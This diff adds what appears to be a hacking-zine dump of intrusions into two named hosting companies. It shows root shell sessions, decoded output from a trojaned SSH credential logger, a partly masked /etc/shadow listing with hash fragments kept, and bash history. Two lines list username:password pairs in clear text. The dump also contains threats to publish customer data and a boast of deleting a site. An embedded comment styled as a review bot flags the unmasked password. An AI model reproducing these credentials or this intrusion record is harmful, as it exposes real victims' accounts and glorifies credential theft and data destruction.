+ownage.net.     86400   IN      NS      dns.vitalspeeds.com.
+ownage.net.     86400   IN      NS      ns2.vitalspeeds.com.
+
+
+ownage.net.     14400   IN      A       72.20.28.204
+
+localhost.ownage.net.   14400   IN      A       127.0.0.1
+
+ownage.net.     14400   IN      MX      0       ownage.net.
+
+mail    14400   IN      CNAME   ownage.net.
+www     14400   IN      CNAME   ownage.net.
+ftp     14400   IN      CNAME   ownage.net.
+absolute.ownage.net.    14400   IN      A       72.20.28.205
+talk.about.ownage.net.  14400   IN      A       72.20.18.131
+complete.ownage.net.    14400   IN      A       72.20.28.206
+
+
+
+
+_______         _______   .________
+\   _  \ ___  __\   _  \  |   ____/
+/  /_\  \\  \/  /  /_\  \ |____  \ 
+\  \_/   \>    <\  \_/   \/       \
+ \_____  /__/\_ \\_____  /______  /
+       \/      \/      \/       \/ 
+                __                     .__          __  .__                      
+  _____ _____  |  | ______  __________ |  |  __ ___/  |_|__| ____   ____   ______
+ /     \\__  \ |  |/ /  _ \/  ___/  _ \|  | |  |  \   __\  |/  _ \ /    \ /  ___/
+|  Y Y  \/ __ \|    <  <_> )___ (  <_> )  |_|  |  /|  | |  (  <_> )   |  \\___ \ 
+|__|_|  (____  /__|_ \____/____  >____/|____/____/ |__| |__|\____/|___|  /____  >
+      \/     \/     \/         \/                                      \/     \/ 
+          __________                _________              
+          \______   \_______  ____ /   _____/ ____   ____  
+  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
+           |____|     |__|   \____/_______  /\___  >\___  >
+                                          \/     \/     \/ 
+
+
+Delivered-To: glafkos@gmail.com
+Received: by 10.223.117.209 with SMTP id s17cs437044faq;
+        Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
+Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
+        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
+Return-Path: 
+Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
+        by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
+        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
+Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
+Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
+Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
+	 Thu, 2 Jul 2009 13:31:22 -0700
+Message-ID: 
+Return-Path: glafk0s@hotmail.com
+Content-Type: multipart/alternative;
+	boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"
+
+
+X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)
+
+
+From: james knuth 
+To: , , ,
+	, , ,
+	, ,
+	, , ,
+	, ,
+	, , ,
+	, ,
+	, ,
+	, ,
+	, , ,
+	
+Subject: Makosolutions, LLC
+Date: Thu, 2 Jul 2009 22:31:22 +0200
+Importance: Normal
+MIME-Version: 1.0
+X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]
+
+MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
+    - Hacked.
+
+I will keep this short and simple, you hosted someone I want down and I decided to take down your company 
+and publish your customers information for that.
+
+// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..
+
+
+HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ
+
+                +----------------------------[ Owned ]----------------------------+
+                |          Hack everyone you can and then hack some more          |
+                |                           Owned[DC] v2                          |
+                |                   _______ . _______ . _______                   |
+                |             Get in as anonymous, Leave with no trace.           |
+                |                                                                 |
+                +-----------------------------------------------------------------+
+         [ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]
+
+ 08:24:44 up 519 days, 11:20,  3 users,  load average: 0.05, 0.10, 0.09
+makos2   pts/1        61.17.231.6      Fri Jun 26 08:12   still logged in   
+makos2   pts/3        61.17.231.6      Fri Jun 26 04:10 - 04:25  (00:15)    
+makos2   pts/7        61.17.231.6      Fri Jun 26 04:09 - 04:09  (00:00)    
+makos2   pts/5        61.17.231.6      Fri Jun 26 03:58 - 04:09  (00:11)    
+makos2   pts/4        61.17.231.6      Fri Jun 26 03:54   still logged in   
+
+wtmp begins Tue Jun  2 01:09:06 2009
+Owned[DC]:[~]# date
+Fri Jun 26 08:26:44 EDT 2009
+Owned[DC]:[~]# uname -a
+Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
+Owned[DC]:[~]# 
+
+
+Owned[DC]:[~]# cd /var/run/ssh
+Owned[DC]:[/var/run]# gcc -o decode decode.c 
+Owned[DC]:[/var/run]# ./decode ssh.old 
+HOOKOUT: 67.225.142.98 root:_censored_
+HOOKIN: root:_censored_
+HOOKOUT: 66.96.220.213 root:_censored_
+.
+.
+.
+HOOKIN: makos2:_censored_
+HOOKOUT: 64.191.116.202 root:_censored_
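Review bot: the HOOKOUT line just above the Owned[DC] banner in this region keeps its user:password field in clear, while the decoded ssh.old output directly above this note masks the same field as "_censored_" for the same host. If the mirror is meant to carry the zine byte-for-byte as published, state that in README.md; otherwise mask that one field to match the rest before this lands, since a commit keeps it in history even if the file is edited later. The same decision applies to the /etc/shadow listing that follows, where the start of each password field is masked but the trailing hash characters are kept.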
+
+Owned[DC]:[/var/run]# w
+ 08:32:59 up 519 days, 11:28,  3 users,  load average: 0.23, 0.22, 0.13
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+makos2   pts/0    61.17.231.6      03:53    3:54   0.13s  0.00s sshd: makos2 [priv]
+makos2   pts/1    61.17.231.6      08:12    6.00s  0.06s  0.01s sshd: makos2 [priv]
+makos2   pts/4    61.17.231.6      03:54   18:40   0.02s  0.01s sshd: makos2 [priv]
+Owned[DC]:[/var/run]# 
+
+Owned[DC]:[/var/run]# cat /etc/shadow
+root:_censored_:14418:0:99999:7:::
+bin:*:13901:0:99999:7:::
+daemon:*:13901:0:99999:7:::
+adm:*:13901:0:99999:7:::
+lp:*:13901:0:99999:7:::
+sync:*:13901:0:99999:7:::
+shutdown:*:13901:0:99999:7:::
+halt:*:13901:0:99999:7:::
+mail:*:13901:0:99999:7:::
+news:*:13901:0:99999:7:::
+uucp:*:13901:0:99999:7:::
+operator:*:13901:0:99999:7:::
+games:*:13901:0:99999:7:::
+gopher:*:13901:0:99999:7:::
+ftp:*:13901:0:99999:7:::
+nobody:*:13901:0:99999:7:::
+dbus:!!:13901:0:99999:7:::
+vcsa:!!:13901:0:99999:7:::
+rpm:!!:13901:0:99999:7:::
+haldaemon:!!:13901:0:99999:7:::
+netdump:!!:13901:0:99999:7:::
+nscd:!!:13901:0:99999:7:::
+sshd:!!:13901:0:99999:7:::
+rpc:!!:13901:0:99999:7:::
+mailnull:!!:13901:0:99999:7:::
+smmsp:!!:13901:0:99999:7:::
+pcap:!!:13901:0:99999:7:::
+xfs:!!:13901:0:99999:7:::
+pegasus:!!:13901:0:99999:7:::
+mysql:!!:13901::::::
+mailman:*:13901::::::
+cpanel:*:13901::::::
+systuser:!!:13901:0:99999:7:::
+named:!!:13901::::::
+clamav:!!:13901::::::
+dorothy:_censored_:14126:0:99999:7:::
+fileport:_censored_:13902:0:99999:7:::
+icstune:_censored_:13902:0:99999:7:::
+krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
+kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
+makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
+makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
+marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
+mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
+mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
+nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
+rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
+spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
+sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
+statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
+tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
+sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
+hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
+cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
+cpanel-horde:*:13949::::::
+cpanel-phpmyadmin:*:13949::::::
+cpanel-phppgadmin:*:13949::::::
+makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
+wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
+cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
+proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
+tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
+floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
+serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
+simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
+themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
+theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
+xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
+barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
+c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
+bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
+hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
+cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
+lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
+contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
+musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
+jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
+cpanelhorde:*:14037::::::
+cpanelphpmyadmin:*:14037::::::
+cpanelphppgadmin:*:14037::::::
+cpanelroundcube:*:14037::::::
+okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
+pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
+ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
+cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
+sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
+jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
+portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
+newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
+renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
+indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
+lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
+miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
+whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
+zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
+tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
+uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
+raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
+flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
+phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
+ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
+xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
+jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
+exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
+exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
+quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
+njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
+vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
+losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
+newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
+lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
+lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
+nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
+services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
+worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
+eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
+aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
+workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
+megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
+espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
+dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
+niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
+glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
+theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
+missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
+theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
+simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
+concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
+worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
+x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
+american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
+firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
+xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
+imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
+headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
+performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
+snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
+importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
+holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
+rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
+perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
+sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
+austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
+arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
+albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
+jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
+sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
+sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
+bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
+laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
+dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
+
+Owned[DC]:[/backup]# cat ~/.bash_history
+ssh 64.191.54.229 -l butts 
+#1244614734
+ssh 64.191.54.229 -l butts
+#1244651529
+ssh butts@64.191.54.229
+#1244644856
+ssh 66.96.220.213 -l makosolutions 
+#1244644866
+ssh 66.96.220.213 -l makosolutions -p 2222 
+#1244645088
+ssh 66.96.220.213 -l mako -p 2222
+#1244650823
+top -c
+#1244651468
+ssh 66.96.220.213
+#1244651606
+ssh 66.96.220.213 -l makosolutions 
+#1244659374
+ifconfig | grep 67.225.142.98
+#1244659384
+ssh -l butts server.holeinthewallhosting.com
+#1244659474
+nmap server.holeinthewallhosting.com
+#1244659875
+ssh -l butts server.holeinthewallhosting.com
+#1244659891
+ssh -l butts 64.191.54.229
+#1244677757
+ssh -l  makosolutions  66.96.220.213 
+#1244810932
+exit
+#1244944507
+ssh 64.191.54.229 -l butts
+#1244971944
+ssh -l butts 64.191.54.229
+#1245004682
+ssh 64.191.116.203
+#1245013655
+exit
+#1245067142
+ssh 66.96.220.213
+#1245062070
+ssh 66.96.220.213
+#1245074394
+ssh 64.191.116.203
+#1245076716
+exit
+#1245058974
+ssh 66.96.220.213
+#1245082594
+ssh 64.191.116.203
+#1245141381
+grep nukelar.reality-matrix.org /etc/trueuserdomains 
+#1245141388
+grep nukelar.reality-matrix.org /etc/userdomains 
+#1245141593
+ssh 64.191.116.203
+#1245161918
+ssh 66.96.220.213
+#1245161939
+telnet 66.96.220.213 22
+#1245161953
+telnet 66.96.220.213 53
+#1245161969
+nmap 66.96.220.213
+#1245162042
+ssh 66.96.220.213 -p 80
+#1245147550
+ssh 64.191.116.203
+#1244659875
+ssh -l butts server.holeinthewallhosting.com
+#1244659891
+ssh -l butts 64.191.54.229
+#1244677757
+ssh -l  makosolutions  66.96.220.213 // infosec.org.uk
+#1244810932
+exit
+#1244944507
+ssh 64.191.54.229 -l butts
+#1244971944
+ssh -l butts 64.191.54.229
+#1245004682
+ssh 64.191.116.203
+#1245013655
+exit
+#1245067142
+ssh 66.96.220.213
+#1245062070
+ssh 66.96.220.213
+#1245074394
+ssh 64.191.116.203
+#1245076716
+exit
+#1245058974
+ssh 66.96.220.213
+#1245082594
+ssh 64.191.116.203
+#1245141381
+grep nukelar.reality-matrix.org /etc/trueuserdomains 
+#1245141388
+grep nukelar.reality-matrix.org /etc/userdomains 
+#1245141593
+ssh 64.191.116.203
+#1245161918
+ssh 66.96.220.213
+#1245161939
+telnet 66.96.220.213 22
+#1245161953
+telnet 66.96.220.213 53
+#1245161969
+nmap 66.96.220.213
+#1245162042
+ssh 66.96.220.213 -p 80
+#1245147550
+ssh 64.191.116.203
+#1245184460
+ssh 66.96.220.213
+#1245199770
+ssh -l makosolutions 66.96.220.213 
+#1245318670
+vi /etc/csf/csf.denyip
+#1245318687
+ssh 66.96.220.213
+#1245318707
+ssh root@66.96.220.213
+#1245318749
+ssh mako@66.96.220.213 -p2222
+#1245318770
+ssh mako@66.96.220.213 -p 2222
+#1245318842
+ssh mako@66.96.220.213 -p2222
+#1245316906
+ssh 66.7.198.124
+#1245317031
+ssh 66.7.198.124
+#1245317159
+ssh 66.96.220.213
+#1245318179
+ssh  66.96.220.213
+#1245319038
+ssh 67.225.159.152 
+#1245319073
+ssh 67.225.159.152 -p22
+#1245319077
+ssh 67.225.159.152 -p 22
+.
+.
+.
+csf -l | grep 66.96.211.181
+#1245999632
+apf
+#1246000060
+ssh 66.96.211.181 -l root
+#1246000637
+grep 66.96.211.181 /var/log/messages
+#1246002631
+cat /usr/local/psa/version
+#1246002640
+ls /usr/local/psa/version
+#1246015247
+ls /usr/local/psa/version
+#1245998530
+ssh 64.191.72.85
+#1245998556
+telnet 64.191.72.85 25
+#1245998595
+vzlist -a
+#1246001328
+ssh 64.191.72.85
+
+Owned[DC]:[/backup]# df -h
+Filesystem            Size  Used Avail Use% Mounted on
+/dev/sda7             2.0G  426M  1.5G  23% /
+/dev/sdb1             147G   61G   79G  44% /backup
+/dev/sda1            1012M   46M  915M   5% /boot
+none                  2.0G     0  2.0G   0% /dev/shm
+/dev/sda8             121G   32G   83G  28% /home
+/dev/sda6             2.0G   37M  1.9G   2% /tmp
+/dev/sda2             9.9G  5.6G  3.9G  60% /usr
+/dev/sda5             9.9G  2.1G  7.3G  23% /var
+/tmp                  2.0G   37M  1.9G   2% /var/tmp
+Owned[DC]:[/backup]# 
+
+Owned[DC]:[/etc/pam.d]# cat sshd 
+#%PAM-1.0
+auth       required     pam_stack.so service=system-auth
+auth       required     pam_nologin.so
+account    required     pam_stack.so service=system-auth
+password   required     pam_stack.so service=system-auth
+session    required     pam_stack.so service=system-auth
+session    required     pam_loginuid.so
+
+auth       required     pam_shells.so 
+
+Owned[DC]:[/var/run]# hostname
+puma.makosolutions.net
+Owned[DC]:[/var/run]# 
+
+Owned[DC]:[~]# lsof -i TCP:22
+COMMAND   PID   USER   FD   TYPE    DEVICE SIZE NODE NAME
+sshd    17433   root    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
+sshd    17441 makos2    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
+sshd    21409   root    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
+sshd    21412 makos2    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
+sshd    26799   root    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
+sshd    26806 makos2    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
+ssh     26887   root    3u  IPv4 791291132       TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
+sshd    29596   root    3u  IPv6 791533593       TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED) 
+// RoMeO logged in just before the rm -rf / of makosolutions.com
+sshd    30850   root    3u  IPv6 783032196       TCP *:ssh (LISTEN)
+
+
+
+_______         _______    ________
+\   _  \ ___  __\   _  \  /  _____/
+/  /_\  \\  \/  /  /_\  \/   __  \ 
+\  \_/   \>    <\  \_/   \  |__\  \
+ \_____  /__/\_ \\_____  /\_____  /
+       \/      \/      \/       \/ 
+.__           .__         .__        __  .__                          .__  .__   
+|  |__   ____ |  |   ____ |__| _____/  |_|  |__   ______  _  _______  |  | |  |  
+|  |  \ /  _ \|  | _/ __ \|  |/    \   __\  |  \_/ __ \ \/ \/ /\__  \ |  | |  |  
+|   Y  (  <_> )  |_\  ___/|  |   |  \  | |   Y  \  ___/\     /  / __ \|  |_|  |__
+|___|  /\____/|____/\___  >__|___|  /__| |___|  /\___  >\/\_/  (____  /____/____/
+     \/                 \/        \/          \/     \/             \/           
+.__                    __  .__                          
+|  |__   ____  _______/  |_|__| ____    ____            
+|  |  \ /  _ \/  ___/\   __\  |/    \  / ___\    ______ 
+|   Y  (  <_> )___ \  |  | |  |   |  \/ /_/  >  /_____/ 
+|___|  /\____/____  > |__| |__|___|  /\___  /           
+     \/           \/               \//_____/            
+__________                _________              
+\______   \_______  ____ /   _____/ ____   ____  
+ |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ |    |     |  | \(  <_> )        \  ___/\  \___ 
+ |____|     |__|   \____/_______  /\___  >\___  >
+                                \/     \/     \/ 
+
+
+64.191.54.229 0x3aownt:DlE46Y8KpH
+                +----------------------------[ Owned ]----------------------------+
+                |          Hack everyone you can and then hack some more          |
+                |                           Owned[DC] v2                          |
+                |                   _______ . _______ . _______                   |
+                |             Get in as anonymous, Leave with no trace.           |
+                |                                                                 |
+                +-----------------------------------------------------------------+
+         [ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]
+
+ 11:12:13 up 78 days, 17:02,  0 users,  load average: 1.73, 2.17, 2.23
+mrich    pts/0        75-28-177-133.li Thu Jun 25 22:40 - 22:47  (00:06)    
+jayzer   pts/1        cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49  (00:04)    
+fmystic  pts/1        cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14  (00:46)    
+butts    pts/0        puma.makosolutio Wed Jun 24 21:47 - 02:54  (05:07)    
+bwc05    pts/1        host-136-245.flt Wed Jun 24 00:18 - 00:18  (00:00)    
+
+wtmp begins Wed Apr 29 04:10:02 2009
+root@server [~]# 
+
+
+root@server [~]# lsof -i -n | grep ssh
+sshd      13173     root    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
+sshd      13176      hsp    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
+sshd      13285     root    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
+sshd      13287 stephenm    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
+sshd      13287 stephenm    7u  IPv4 505107114       TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
+sshd      13287 stephenm    8u  IPv4 505106277       TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
+sshd      30096     root    3u  IPv6 485663697       TCP *:ssh (LISTEN)
+root@server [~]# 
+
+
+root@server [/var/run]# gcc -o decode decode.c 
+͏Іʵroot@server [/var/run]# ./decode ssh.old 
+HOOKIN: falados:$.lWKq._censored_
+HOOKIN: smithah:_censored_
+.
+.
+.
+HOOKIN: karsh:vnm_censored_
+HOOKIN: karsh:vnm_censored_
+HOOKIN: smithah:Coverfir_censored_
+HOOKIN: karsh:vn_censored_
+HOOKIN: mrich:t23_censored_
+root@server [/var/run]# 
+
+root@server [/var/run]# hostname
+server.holeinthewallhosting.net
+root@server [/var/run]# uname -a
+Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
+root@server [/var/run]# date
+Fri Jun 26 11:16:32 CDT 2009
+root@server [/var/run]# ifconfig -a
+eth0      Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.229  Bcast:64.191.54.239  Mask:255.255.255.240
+          inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000 
+          RX bytes:587506583 (560.2 MiB)  TX bytes:4170982921 (3.8 GiB)
+          Interrupt:217 Base address:0x2000 
+
+eth0:1    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.230  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:2    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.231  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:3    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.232  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:4    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.233  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:5    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.197  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
